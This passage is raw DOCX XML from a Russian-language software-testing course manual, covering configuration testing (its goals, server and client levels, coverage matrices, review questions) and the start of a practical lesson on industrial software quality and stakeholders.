          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Конфигурационное тестирование (Configuration Testing) — специальный вид тестирования, направленный на проверку работы программного обеспечения при различных конфигурациях системы (заявленных платформах, поддерживаемых драйверах, при различных конфигурациях компьютеров и т.д.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В зависимости от типа проекта конфигурационное тестирование может иметь разные цели:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проект по профилированию работы системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель Тестирования: определить оптимальную конфигурацию оборудования, обеспечивающую требуемые характеристики производительности и времени реакции тестируемой системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проект по миграции системы с одной платформы на другую</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель Тестирования: Проверить объект тестирования на совместимость с объявленным в спецификации оборудованием, операционными системами и программными продуктами третьих фирм.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Уровни проведения тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для клиент-серверных приложений конфигурационное тестирование можно условно разделить на два уровня (для некоторых типов приложений может быть актуален только один):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Серверный</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Клиентский</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На первом (серверном) уровне, тестируется взаимодействие выпускаемого программного обеспечения с окружением, в которое оно будет установлено:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Аппаратные средства (тип и количество процессоров, объем памяти, характеристики сети / сетевых адаптеров и т.д.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программные средства (ОС, драйвера и библиотеки, стороннее ПО, влияющее на работу приложения и т.д.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основной упор здесь делается на тестирование с целью определения оптимальной конфигурации оборудования, удовлетворяющего требуемым характеристикам качества (эффективность, портативность, удобство сопровождения, надежность).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На следующем (клиентском) уровне, программное обеспечение тестируется с позиции его конечного пользователя и конфигурации его рабочей станции. На этом этапе будут протестированы следующие характеристики: удобство использования, функциональность. Для этого необходимо будет провести ряд тестов с различными конфигурациями рабочих станций:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тип, версия и битность операционной системы (подобный вид тестирования называется кросс-платформенное тестирование)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тип и версия Web барузера, в случае если тестируется Web приложение (подобный вид тестирования называется кросс-браузерное тестирование)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тип и модель видео адаптера (при тестировании игр это очень важно)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Работа приложения при различных разрешениях экрана</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Версии драйверов, библиотек и т.д. (для JAVA приложений версия JAVA машины очень важна, тоже можно сказать и для .NET приложений касательно версии .NET библиотеки)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Порядок проведения тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перед началом проведения конфигурационного тестирования рекомендуется:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>создавать матрицу покрытия (матрица покрытия - это таблица, в которую заносят все возможные конфигурации),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>проводить приоритезацию конфигураций (на практике, скорее всего, все желаемые конфигурации проверить не получится),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>шаг за шагом, в соответствии с расставленными приоритетами, проверяют каждую конфигурацию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Уже на начальном этапе становится очевидно, что чем больше требований к работе приложения при различных конфигурациях рабочих станций, тем больше тестов нам необходимо будет провести. В связи с этим, рекомендуем, по возможности, автоматизировать этот процесс, так как именно при конфигурационном тестировании автоматизация реально помогает сэкономить время и ресурсы. Конечно же автоматизированное тестирование не является панацеей, но в данном случае оно окажется очень эффективным помощником.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вывод:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> конфигурационным называется тестирование совместимости выпускаемого продукта (программное обеспечение) с различным аппаратным и программным средствами. Основные цели - определение оптимальной конфигурации и проверка совместимости приложения с требуемым окружением (оборудованием, ОС и т.д.). Автоматизация конфигурационного тестирования позволяет избежать лишних расходов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое конфигурационное тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие цели конфигурационного тестирования?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005834D2" w:rsidRPr="00617AC0" w:rsidRDefault="005834D2" w:rsidP="005834D2">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие существуют этапы конфигурационного тестирования?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="_Toc22646783"/>
      <w:bookmarkStart w:id="157" w:name="_Toc26278738"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 19 Тестирование качества программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="rtxt"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="rtxt"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Рассмотреть особенности подхода к обеспечению качества программного продукта средствами тестирования. Изучить на примере методику выбора критериев качества тестирования, определить фазы процесса тестирования и шаги тестового цикла, применяемые в индустриальном тестировании. Изучить структуру документа «Тестовый план», планируемые типы тестирования для различных частей продукта или для проверки различных характеристик продукта, подходы к тестированию спецификаций и сценариев. Рассмотреть ручной подход и подход генерации тестовых наборов при разработке тестов. Сравнить методы автоматизации исполнения тестов. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6985" cy="79375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="563" name="Рисунок 563" descr="http://www.intuit.ru/img/emp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ttp://www.intuit.ru/img/empty.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId374" r:link="rId375"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6985" cy="79375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6985" cy="6985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="564" name="Рисунок 564" descr="http://www.intuit.ru/img/emp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www.intuit.ru/img/empty.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId374" r:link="rId375"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6985" cy="6985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6985" cy="79375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="565" name="Рисунок 565" descr="http://www.intuit.ru/img/emp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www.intuit.ru/img/empty.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId374" r:link="rId375"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6985" cy="79375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">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434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Краткие теоретические сведения </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Качество программного продукта и тестирование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Качество программного продукта можно оценить некоторым набором характеристик, определяющих, насколько продукт «хорош» с точки зрения всех потенциально заинтересованных в нем сторон. Такими сторонами являются:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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заказчик продукта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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спонсор</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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конечный пользователь</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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разработчики продукта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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тестировщики продукта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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инженеры поддержки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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отдел обучения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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отдел продаж и т.п.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Каждый из участников может иметь различное представление о продукте и по-разному судить о том, насколько он хорош или плох, то есть насколько высоко качество продукта. С точки зрения разработчика, продукт может быть настолько хорош, насколько хороши заложенные в нем алгоритмы и технологии. Пользователю продукта, скорее всего, безразличны детали внутренней реализации, его в первую очередь волнуют вопросы функциональности и надежности. Спонсора интересует цена и совместимость с будущими технологиями. Таким образом, задача обеспечения качества продукта выливается в задачу определения заинтересованных лиц, согласования их критериев качества и нахождения оптимального решения, удовлетворяющего этим критериям.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
